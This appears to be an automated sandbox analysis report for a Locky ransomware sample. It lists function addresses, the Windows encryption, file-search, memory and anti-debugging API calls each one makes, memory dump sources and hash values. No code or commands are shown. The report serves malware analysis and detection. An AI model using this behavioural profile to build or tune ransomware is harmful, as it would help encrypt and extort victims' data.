Opcode Fuzzy Hash: 4ddf0aaea5bf63d9cc2b16d17124679eb37e058fb133eb14cd2cb6b7844cd9bd
Instruction Fuzzy Hash: DE11037129F235DBC614BA10B8041B4736CEB5F3127F27907D54FA3252C7282A4BAACE

Function 005C0605 Relevance: 2.3, APIs: 1, Instructions: 1066
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000), ref: 005C05FC

Memory Dump Source

Source File: 00000000.00000002.2442326137.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c0000_LockyRansom.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e9d80ed9f5a34afd5e9ec27ba938614b3f464397ecac1455d929d020dcfe47f6
Instruction ID: 8bed0da9f663b3c12172cd30d5a5c24e58dfef0e5b6dbe521a0a2928e0edb15c
Opcode Fuzzy Hash: e9d80ed9f5a34afd5e9ec27ba938614b3f464397ecac1455d929d020dcfe47f6
Instruction Fuzzy Hash: 0411E1A6A0D3D18FDB135B788450B88BF30BE83F5430E14C9D8C06B893C351782AC756

Function 004221DB Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DsRoleGetPrimaryDomainInformation.NETAPI32 ref: 004223E1

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: DomainInformationPrimaryRole
String ID:
API String ID: 2855586375-0
Opcode ID: 750127e6ce5fe56f3b8431e99cf1759dea1986f40bbcf984274c7c7a514c641c
Instruction ID: c4e3557a329b275ec11c2af1519d607fa45f9a128f6d33727c824bd4795e7878
Opcode Fuzzy Hash: 750127e6ce5fe56f3b8431e99cf1759dea1986f40bbcf984274c7c7a514c641c
Instruction Fuzzy Hash: 2AB092A464E034A1C2006A222E805FBA01CAB27309AA138AB044A33002497C0086A91E

Function 00419717 Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEntriesInAclA.ADVAPI32 ref: 00419808

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: Entries
String ID:
API String ID: 3796208217-0
Opcode ID: 9a7382421d20b0b878654e8805e2f6d73b414b0d8c3681efe2f14d13f7a122a5
Instruction ID: e26bd9fa1095d7f8864f468621c20d3cbf7c1ce4626d098f6b66a9bab9e7ce82
Opcode Fuzzy Hash: 9a7382421d20b0b878654e8805e2f6d73b414b0d8c3681efe2f14d13f7a122a5
Instruction Fuzzy Hash: FCB0127047C000CAC300AB5484380F8321CB60F302334200EC00F400114B1908CAB51F

Function 00690000 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00000688,00001000,00000040), ref: 00690065

Memory Dump Source

Source File: 00000000.00000002.2442653732.0000000000690000.00000040.00000020.00020000.00000000.sdmp, Offset: 00690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_LockyRansom.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1ac42c9dbe1fbae4a550a043b37b0c5896a51510a9400e2db316b1ef01228121
Instruction ID: 1e82db8c2911af7a5cc37037b18bbe7bd918006e6e39bffeab923613ef951a6d
Opcode Fuzzy Hash: 1ac42c9dbe1fbae4a550a043b37b0c5896a51510a9400e2db316b1ef01228121
Instruction Fuzzy Hash: 8C012675A413056FEF101F70CC04B8F3AAEAFC8720F414828F98AA7681CE7CD8808658

Function 005C05EF Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000), ref: 005C05FC

Memory Dump Source

Source File: 00000000.00000002.2442326137.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c0000_LockyRansom.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a9a4fa599d775aa83550951cd01ab53a510ae55495336f8eeb8bc52accc60b48
Instruction ID: 65ce390d9ce214b0b9a70d03eb22b0c205847d94ce1a40b3c250883ace489992
Opcode Fuzzy Hash: a9a4fa599d775aa83550951cd01ab53a510ae55495336f8eeb8bc52accc60b48
Instruction Fuzzy Hash: EAB012B22C038477EB304E614C0EF8A3661ABC8FA3F350000FB106B1C48AF0E8018624

Non-executed Functions

Function 00403A6C Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 004068B6
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004068CB
UnhandledExceptionFilter.KERNEL32(004792E8), ref: 004068D6
GetCurrentProcess.KERNEL32(C0000409), ref: 004068F2
TerminateProcess.KERNEL32(00000000), ref: 004068F9

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: e57c69cd8dfea1af671144ca0df57bf79927f0cc619d4d823731fdda2c415375
Instruction ID: b290d19a48650710557560a24cdce15a6a60c0460db7731dd007634dbffc930f
Opcode Fuzzy Hash: e57c69cd8dfea1af671144ca0df57bf79927f0cc619d4d823731fdda2c415375
Instruction Fuzzy Hash: 1721D4B88002009FD754DF69EE88A483BA4FB48B55F50583EE80997362D7F459858F3D

Function 0040FBF0 Relevance: 4.6, APIs: 3, Instructions: 127encryptionCOMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 0040FC15

Part of subcall function 00401946: KiUserExceptionDispatcher.NTDLL(00000000,m7@,?,csm,?,0040376D,?,0047D0DC,?,E06D7363,1FFFFFFF,19930522), ref: 00401988

CryptEncrypt.ADVAPI32(?,00000000,?,?,?,?,?), ref: 0040FC9B
GetLastError.KERNEL32(?,00000000,?,?,?,?,?), ref: 0040FCDF

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: CryptDispatcherEncryptErrorExceptionException@8LastThrowUser
String ID:
API String ID: 2264617593-0
Opcode ID: 0084bb1cd22e2de217d877fe792ab5710e198f42536f6d863e84f27d3cb13e3f
Instruction ID: 86b77c96dd80f2b4247dec5ebed8ed5b11102682704055c09c1c7db4edca1041
Opcode Fuzzy Hash: 0084bb1cd22e2de217d877fe792ab5710e198f42536f6d863e84f27d3cb13e3f
Instruction Fuzzy Hash: B931E73019E10CEAEA34CA5084468F5336CBB5B301B7174779C0F769D2D3386A5FBA4A

Function 0040F980 Relevance: 4.6, APIs: 3, Instructions: 94encryptionCOMMON

Download Yara Rule

APIs

CryptGenRandom.ADVAPI32(?,?,?), ref: 0040F9A2
__CxxThrowException@8.LIBCMT ref: 0040F9F2

Part of subcall function 00401946: KiUserExceptionDispatcher.NTDLL(00000000,m7@,?,csm,?,0040376D,?,0047D0DC,?,E06D7363,1FFFFFFF,19930522), ref: 00401988

GetLastError.KERNEL32(?,?,?), ref: 0040FA20

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: CryptDispatcherErrorExceptionException@8LastRandomThrowUser
String ID:
API String ID: 1112074419-0
Opcode ID: 7c3562a90b332b41043238a41be523435b79b0f718305afdc1b1974ed58dcfc7
Instruction ID: 650e42c9f03ad1bdb63e3f40d1f7d1d8a31d720898254b98d254c0ed2d215352
Opcode Fuzzy Hash: 7c3562a90b332b41043238a41be523435b79b0f718305afdc1b1974ed58dcfc7
Instruction Fuzzy Hash: 5521F5B029D148FBCA34DA409440AF573ACAB4B301B716537940F76992D33C6A4FAA5F

Function 0042E700 Relevance: 3.1, APIs: 2, Instructions: 146COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00000059,?,00000020), ref: 0042E76B
GetUserDefaultUILanguage.KERNEL32 ref: 0042E82F

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: DefaultInfoLanguageLocaleUser
String ID:
API String ID: 1127112782-0
Opcode ID: 77c10df9341b8774a2eb736014f5f45652b3baed9b0ee050ff7fb9fed571095c
Instruction ID: 1ff07d14465ce6d9dc55956dbed75553087b841068d40614c309f807d8d4dc51
Opcode Fuzzy Hash: 77c10df9341b8774a2eb736014f5f45652b3baed9b0ee050ff7fb9fed571095c
Instruction Fuzzy Hash: 5631273038E134DBC610AA83B440AF5736CAB9B301BF07457944F9B152D7686A0BB65F

Function 0042D5D0 Relevance: 3.1, APIs: 2, Instructions: 108fileCOMMON

Download Yara Rule

APIs

FindClose.KERNEL32(00000000), ref: 0042D5F1
FindFirstFileW.KERNEL32(?,?), ref: 0042D656

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 53908860698f17e15de53ed4f6d29caf16c60f70080bc57f36c8f5a6c6598218
Instruction ID: 577dcde79129a6ee61153fd75f6c2bb51cc275da0b78936f382770e5e21318c2
Opcode Fuzzy Hash: 53908860698f17e15de53ed4f6d29caf16c60f70080bc57f36c8f5a6c6598218
Instruction Fuzzy Hash: EC216630F8E138EA8A109A50B8589F5736CEB4B305BF16483900F57116C76D5A9BBA9F

Function 00416170 Relevance: 3.1, APIs: 2, Instructions: 68encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(?,00000000), ref: 004161AE
CryptDestroyKey.ADVAPI32(?), ref: 004161C6

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: Crypt$ContextDestroyRelease
String ID:
API String ID: 1322390979-0
Opcode ID: e702adf58ecf47b63cc5522b8f60f95db412c32e62f385bb032d569ce04f4f92
Instruction ID: cdf26b9c64b4f428902ed45690c03371e591a226f322e920b625f1b22f5a1a5e
Opcode Fuzzy Hash: e702adf58ecf47b63cc5522b8f60f95db412c32e62f385bb032d569ce04f4f92
Instruction Fuzzy Hash: 890108316CE164FBC6208A4088045F5737CAB4B3427373917984F96113CB68EECBAA8F

Function 0040F8D0 Relevance: 1.6, APIs: 1, Instructions: 94encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040F93B

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: 6c642fb519eda613ba863890a13d1c547cb87b2169a0f1f9ffe160fa5c84483b
Instruction ID: 6e4aec4b0e0a83204a63aaccff309ed9bb1bb1a7c116baa791c4071c88ce14a3
Opcode Fuzzy Hash: 6c642fb519eda613ba863890a13d1c547cb87b2169a0f1f9ffe160fa5c84483b
Instruction Fuzzy Hash: 0721F9B228E105FAC230AA548440BF173A8A75B3617316833944BB69D1D3786A4FB69F

Function 0040FB50 Relevance: 1.6, APIs: 1, Instructions: 84encryptionCOMMON

Download Yara Rule

APIs

CryptDestroyKey.ADVAPI32 ref: 0040FBAD

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: CryptDestroy
String ID:
API String ID: 1712904745-0
Opcode ID: a10d2a76bd59464141b46457b3db529f7a62428e5765536d098f1bf6d7819110
Instruction ID: c0c7bfe2595ef8060a4a4e155666853a8e5e9f072bcf79c585a38e1700e6e6ca
Opcode Fuzzy Hash: a10d2a76bd59464141b46457b3db529f7a62428e5765536d098f1bf6d7819110
Instruction Fuzzy Hash: 0111263218D205CAC2308A14C4709B1B378AB5A3517712477884B77DC1EB7C3A0FAE8F

Function 0040FB10 Relevance: 1.5, APIs: 1, Instructions: 28encryptionCOMMON

Download Yara Rule

APIs

CryptDestroyKey.ADVAPI32 ref: 0040FB23

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: CryptDestroy
String ID:
API String ID: 1712904745-0
Opcode ID: e83ffd3c92534e19f287c071f76ed0df3d41f0b1140f30bdfbae265de28abceb
Instruction ID: 2af0b72134494925e1730cbaf74644c64a28d486fcb1097582cd3abe6359deae
Opcode Fuzzy Hash: e83ffd3c92534e19f287c071f76ed0df3d41f0b1140f30bdfbae265de28abceb
Instruction Fuzzy Hash: 9BE0B6702CD245DAD6308AA0E8344F5337CA78F3063713572540EB6895CB38794FAD0A

Function 0040F890 Relevance: 1.5, APIs: 1, Instructions: 24encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040F8A9

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: 9f7604a5a8192a20399c6435b30381e6faaf6432f8dc9890e3c7ed4cac82aa71
Instruction ID: a0f8be43c6ea17bafec26e26e2ff13ab93a8fbf406d37cefdd9f3e4632e034cc
Opcode Fuzzy Hash: 9f7604a5a8192a20399c6435b30381e6faaf6432f8dc9890e3c7ed4cac82aa71
Instruction Fuzzy Hash: D3E0B63324D101DAE230BA508488AF02328AB46310B74E473940B79DD5D37C558FA51F

Function 0040F8B8 Relevance: 1.5, APIs: 1, Instructions: 21encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040F8A9

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: f8ca6ea56645b4b15fcc466af053545b534d41412953f6de13a9c8c595e638b9
Instruction ID: 6b2d96a1ac39bc7434f81dd66a2358c585f75223a442eabf2f856613dff42d85
Opcode Fuzzy Hash: f8ca6ea56645b4b15fcc466af053545b534d41412953f6de13a9c8c595e638b9
Instruction Fuzzy Hash: 3BD0623319D505DAD534EA4094445F03329A75B301BA5E473C40E69D95D37C154EA51B

Function 0041973D Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetSecurityDescriptorDacl.ADVAPI32 ref: 004198FA

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: DaclDescriptorSecurity
String ID:
API String ID: 368980482-0
Opcode ID: b8aabb4657d526885dba57dbed7850d1b9e1530fda39b01ce78759744d36f6fa
Instruction ID: 7cbef6061d2df6491523fde19351ed95174e1d8bbff04b3909f72ac667912731
Opcode Fuzzy Hash: b8aabb4657d526885dba57dbed7850d1b9e1530fda39b01ce78759744d36f6fa
Instruction Fuzzy Hash: 7ED0C9301ED102DA8114DE0494784F2732DAF5B3513313846C01F6A1918B792ECBA65E

Function 004197BD Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 00419962

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: AllocateInitialize
String ID:
API String ID: 220217950-0
Opcode ID: 648c4d91e8fba088d0b4779e384e2025b530f5cdf5f4572d2509f544e9d3ac2a
Instruction ID: 2a2b24405af3c8e1d3deade641f75fe88f150d36fb72bd0a18cc332f025aa5fb
Opcode Fuzzy Hash: 648c4d91e8fba088d0b4779e384e2025b530f5cdf5f4572d2509f544e9d3ac2a
Instruction Fuzzy Hash: BEC002B05AD108CAD740DF9080A84F4B72CAA1F3467A0745EC00F5521297381A8AEA1B

Function 00423053 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00423A20

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: a438c98748b4986ea1805951891a6c4e46f0228f110199421cb1eb8a736f0aef
Instruction ID: dac310d86b8c0015b18cf2360a63935645e9bb2d1dcb880b441697b1dff75bcf
Opcode Fuzzy Hash: a438c98748b4986ea1805951891a6c4e46f0228f110199421cb1eb8a736f0aef
Instruction Fuzzy Hash: FEA002F42AD1A2C7C9446F11785C876677CE6563437E07936A1CB96851CB1C0E43651E

Function 004193D8 Relevance: 1.5, APIs: 1, Instructions: 6encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32 ref: 004193D8

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: 378f132dc5927113c7b8179bccebd0ed11ae8a2058cd9fe2403676ad9aa72da1
Instruction ID: 0a93bc24fba2eab863b12168a2458b22ae8f548d34dea66537af81962f5bf6d4
Opcode Fuzzy Hash: 378f132dc5927113c7b8179bccebd0ed11ae8a2058cd9fe2403676ad9aa72da1
Instruction Fuzzy Hash: 1EA002350CD444EA81280B115C2C4F535BDA65B756326342BE81FC09594F381DDF655E

Function 00405F08 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00005EC6), ref: 00405F0D

Memory Dump Source

Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f8330fde41944224e193f67afc6cc16d993e35fb32822d660fcf56c4b13b140b
Instruction ID: f024cff4287d4bf44263ee6ec9f0a9f10823e1ee2ca6573980b22611895fe8ea
Opcode Fuzzy Hash: f8330fde41944224e193f67afc6cc16d993e35fb32822d660fcf56c4b13b140b
Instruction Fuzzy Hash: C79002B02A1A0086864027749D0D6072AA0DA586177A108756045E4194DF7881469959

